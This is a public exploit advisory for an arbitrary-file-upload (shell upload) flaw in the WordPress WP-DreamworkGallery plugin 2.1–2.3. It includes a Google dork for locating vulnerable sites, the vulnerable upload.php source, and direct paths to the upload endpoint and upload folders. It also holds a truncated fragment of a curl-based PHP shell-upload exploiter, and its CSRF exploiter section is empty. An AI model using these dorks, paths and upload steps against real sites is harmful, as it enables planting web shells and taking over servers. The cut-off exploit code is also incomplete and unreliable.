############################################################################## # Exploit Title : WordPress WP-DreamworkGallery Plugins 2.3 CSRF Shell Upload # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 05/03/2019 # Vendor Homepage : wordpress.org ~ wpslideshow.com # Software Download Link : downloads.wordpress.org/plugin/wp-dreamworkgallery.zip # Software Information Link : wordpress.org/plugins/wp-dreamworkgallery/ # Software Version : 2.1 and 2.3; other previous versions may be vulnerable. Compatible with WordPress 2.5 and 3.0 or higher # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : filetype:xml inurl:/wp-content/plugins/wp-dreamworkgallery # Vulnerability Type : CWE-434 [ Unrestricted Upload of File with Dangerous Type ] CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos ############################################################################## # Description about Software : *************************** wp Dreamwork Gallery is open source software for WordPress. ############################################################################## # Impact : *********** * The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. * Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. * WordPress WP-DreamworkGallery Plugin versions 2.3-2.1 and other versions are prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. In the upload.php code below, the destination directory is taken directly from the request (`$save_path = $_REQUEST['folder'] . '/'`), so the extension and image checks constrain only the file's content, not where it is written; a fix must derive the upload directory server-side and require an authenticated request with CSRF protection. 
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. WordPress Plugin wp Dreamwork Gallery versions 2.1 and 2.3 are vulnerable; prior versions may also be affected. ############################################################################## Vulnerable Source Code : [ upload.php ] (excerpt; the beginning of the file is not shown) ************************************* txt; mysql_free_result($secw_res); // if (!isset($_POST['secw']) || trim($_POST['secw']) == "" || $sec_word_site != $_POST['secw']) { HandleError("Security word error."); exit(0); } // Check post_max_size (http://us3.php.net/manual/en/features.file-upload.php#73762) $POST_MAX_SIZE = ini_get('post_max_size'); $unit = strtoupper(substr($POST_MAX_SIZE, -1)); $multiplier = ($unit == 'M' ? 1048576 : ($unit == 'K' ? 1024 : ($unit == 'G' ? 1073741824 : 1))); if ((int)$_SERVER['CONTENT_LENGTH'] > $multiplier*(int)$POST_MAX_SIZE && $POST_MAX_SIZE) { header("HTTP/1.1 500 Internal Server Error"); // This will trigger an uploadError event in SWFUpload echo "POST exceeded maximum allowed size."; exit(0); } // Settings //$save_path = getcwd() . "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment) $save_path = $_REQUEST['folder'] . 
'/'; $upload_name = "Filedata"; $max_file_size_in_bytes = 2147483647; // 2GB in bytes $extension_whitelist = array("jpg", "gif", "png"); // Allowed file extensions $valid_chars_regex = '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format) // Other variables $MAX_FILENAME_LENGTH = 260; $file_name = ""; $file_extension = ""; $uploadErrors = array( 0=>"There is no error, the file uploaded with success", 1=>"The uploaded file exceeds the upload_max_filesize directive in php.ini", 2=>"The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form", 3=>"The uploaded file was only partially uploaded", 4=>"No file was uploaded", 6=>"Missing a temporary folder" ); // Validate the upload if (!isset($_FILES[$upload_name])) { HandleError("No upload found in \$_FILES for " . $upload_name); exit(0); } else if (isset($_FILES[$upload_name]["error"]) && $_FILES[$upload_name]["error"] != 0) { HandleError($uploadErrors[$_FILES[$upload_name]["error"]]); exit(0); } else if (!isset($_FILES[$upload_name]["tmp_name"]) || !@is_uploaded_file($_FILES[$upload_name]["tmp_name"])) { HandleError("Upload failed is_uploaded_file test."); exit(0); } else if (!isset($_FILES[$upload_name]['name'])) { HandleError("File has no name."); exit(0); } // Validate the file size (Warning: the largest files supported by this code is 2GB) $file_size = @filesize($_FILES[$upload_name]["tmp_name"]); if (!$file_size || $file_size > $max_file_size_in_bytes) { HandleError("File exceeds the maximum allowed size"); exit(0); } if ($file_size <= 0) { HandleError("File size outside allowed lower bound"); exit(0); } // Validate file name (for our purposes we'll just remove invalid characters) $file_name = preg_replace('/[^'.$valid_chars_regex.']|\.+$/i', "", basename($_FILES[$upload_name]['name'])); if (strlen($file_name) == 0 || strlen($file_name) > $MAX_FILENAME_LENGTH) { HandleError("Invalid file name"); exit(0); } // Validate that we won't 
over-write an existing file if (file_exists($save_path . $file_name)) { HandleError("File with this name already exists"); exit(0); } // Validate file extension $path_info = pathinfo($_FILES[$upload_name]['name']); $file_extension = $path_info["extension"]; $is_valid_extension = false; foreach ($extension_whitelist as $extension) { if (strcasecmp($file_extension, $extension) == 0) { $is_valid_extension = true; break; } } if (!$is_valid_extension) { HandleError("Invalid file extension"); exit(0); } // Validate file contents (extension and mime-type can't be trusted) /* Validating the file contents is OS and web server configuration dependant. Also, it may not be reliable. See the comments on this page: http://us2.php.net/fileinfo Also see http://72.14.253.104/search?q=cache:3YGZfcnKDrYJ:www.scanit.be/uploads/php-file-upload.pdf+php+file+command&hl=en&ct=clnk&cd=8&gl=us&client=firefox-a which describes how a PHP script can be embedded within a GIF image file. Therefore, no sample code will be provided here. Research the issue, decide how much security is needed, and implement a solution that meets the needs. */ // Process the file /* At this point we are ready to process the valid file. This sample code shows how to save the file. Other tasks could be done such as creating an entry in a database or generating a thumbnail. Depending on your server OS and needs you may need to set the Security Permissions on the file after it has been saved. */ $tmp_filename = md5(rand() . 'a' . rand() . 'b' . time() . 'c' . 
rand()); if (!@move_uploaded_file($_FILES[$upload_name]["tmp_name"], $save_path.$tmp_filename)) { HandleError("File could not be saved."); exit(0); } else { // check image file $allow_mime = array ('image/gif', 'image/jpeg', 'image/png'); $sz_info = getimagesize($save_path.$tmp_filename); if (empty($sz_info) || !isset($sz_info[0]) || !is_numeric($sz_info[0]) || !isset($sz_info[1]) || !is_numeric($sz_info[1]) || !isset($sz_info['mime']) || !in_array($sz_info['mime'], $allow_mime)) { unlink($save_path.$tmp_filename); HandleError("Invalid file type"); exit(0); } else { rename ($save_path.$tmp_filename, $save_path.$file_name); } } exit(0); /* Handles the error output. This error message will be sent to the uploadSuccess event handler. The event handler will have to check for any error messages and react as needed. */ function HandleError($message) { echo $message; } ?> ############################################################################## # PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter : **************************************************************** "@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ############################################################################## First Exploit Direct Access : ************************* /wp-content/plugins/wp-dreamworkgallery/js/swfupload/js/upload.php Directory File Path : ****************** /wp-content/plugins/wp-dreamworkgallery/js/swfupload/js/....... Vulnerability Error on Page : ************************* No upload found in $_FILES for Filedata - Security word error. Second Exploit Direct Access : *************************** /wp-admin/admin.php?page=dreamwork_manage Directory File Path : ******************* /wp-content/uploads/dreamwork/1_uploadfolder/big/......... /wp-content/uploads/dreamwork/[ID-NUMBER]_uploadfolder/big/...... 
############################################################################## Cross Site Request Forgery CSRF Exploiter => ******************************************
############################################################################## # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##############################################################################